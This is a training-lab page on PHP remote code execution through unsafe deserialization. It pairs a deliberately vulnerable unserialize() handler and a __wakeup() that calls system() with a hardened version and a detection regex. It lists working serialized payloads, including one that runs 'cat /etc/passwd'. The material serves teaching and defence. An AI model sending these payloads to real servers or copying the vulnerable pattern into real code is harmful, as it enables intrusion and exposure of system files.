RCE through unsafe deserialization
This lab demonstrates a Remote Code Execution vulnerability through unsafe deserialization. The application deserializes user-supplied data without proper validation, allowing attackers to execute arbitrary code.
Objective: Craft malicious serialized data to execute arbitrary commands on the server.
```php
// Handle deserialization request
if (isset($_POST['data']) && !empty($_POST['data'])) {
    $serialized_data = $_POST['data'];
    // Vulnerable: Direct deserialization without validation
    try {
        $deserialized = unserialize($serialized_data);
        if ($deserialized !== false) {
            // Process deserialized data
        }
    } catch (Exception $e) {
        // Error handling
    }
}

// Vulnerable class
class VulnerableClass {
    public $command;
    public function __wakeup() {
        // Vulnerable: Direct command execution
        if (isset($this->command)) {
            system($this->command);
        }
    }
}

// Example malicious payload:
// O:15:"VulnerableClass":1:{s:7:"command";s:6:"whoami";}
```
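The following block is an added example, not part of the lab's own code. It places the lab's vulnerable handler next to a hardened one so the difference in behaviour can be seen on the lab's own payload. The function names `containsSerializedObject` and `safeUnserialize`, the benign sample input, and the stub `__wakeup()` that only echoes instead of calling `system()` are assumptions made for this example; the class name and the payload come from the page.

```php
<?php
declare(strict_types=1);

// Mirror of the lab's class so the contrast is visible. Here __wakeup()
// only reports that it ran; in the lab it calls system() on $command.
class VulnerableClass {
    public $command;
    public function __wakeup() {
        echo "__wakeup() executed for command: {$this->command}\n";
    }
}

// Returns true when the string declares a PHP object (O:<len>:"...") or a
// custom-serialized object (C:<len>:"..."). The same pattern works as a
// log or WAF rule for spotting object payloads in request bodies.
function containsSerializedObject(string $data): bool {
    return (bool) preg_match('/(?<![A-Za-z0-9])[OC]:\d+:"/', $data);
}

// Hardened deserialization: no class is ever instantiated, so no __wakeup(),
// __destruct() or other magic method can be triggered by attacker data.
function safeUnserialize(string $data) {
    if (containsSerializedObject($data)) {
        return false; // refuse objects outright instead of relying on the fallback below
    }
    // allowed_classes => false: any object notation that slips through becomes
    // __PHP_Incomplete_Class rather than a live object (PHP >= 7.0).
    return @unserialize($data, ['allowed_classes' => false]);
}

// The lab's payload, and a constructed benign array a legitimate client might send.
$malicious = 'O:15:"VulnerableClass":1:{s:7:"command";s:6:"whoami";}';
$benign    = 'a:2:{s:4:"user";s:5:"alice";s:4:"role";s:6:"viewer";}';

// Vulnerable path: the object is revived and __wakeup() runs during unserialize().
echo "Vulnerable handler:\n";
$obj = unserialize($malicious);               // prints "__wakeup() executed ..."
var_dump($obj instanceof VulnerableClass);    // bool(true)

// Hardened path: the payload is refused and __wakeup() never runs;
// plain data structures still deserialize normally.
echo "\nHardened handler:\n";
var_dump(safeUnserialize($malicious));        // bool(false)
var_dump(safeUnserialize($benign));           // array(2) { ["user"]=> ... ["role"]=> ... }

// Even without the pre-check, allowed_classes => false neutralizes the object:
$incomplete = unserialize($malicious, ['allowed_classes' => false]);
var_dump($incomplete instanceof __PHP_Incomplete_Class); // bool(true), and no __wakeup() call
```

Run it with `php example.php`. The point of the two layers is that `allowed_classes => false` removes the gadget entry point (no object means no magic method), while the pre-check gives a cheap signal you can also apply at the edge or in logs; for new code, a format with no object semantics such as JSON avoids the problem entirely.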
Try these serialized payloads:

O:15:"VulnerableClass":1:{s:7:"command";s:6:"whoami";}
O:15:"VulnerableClass":1:{s:7:"command";s:6:"ls -la";}
O:15:"VulnerableClass":1:{s:7:"command";s:15:"cat /etc/passwd";}
O:15:"VulnerableClass":1:{s:7:"command";s:14:"id && uname -a";}

Payload Structure:

O:15:"VulnerableClass" - Object with class name (the number is the length of the class name)
1:{s:7:"command";s:6:"whoami";} - Property count, then each property name and value as length-prefixed strings

Follow these steps to test the vulnerability: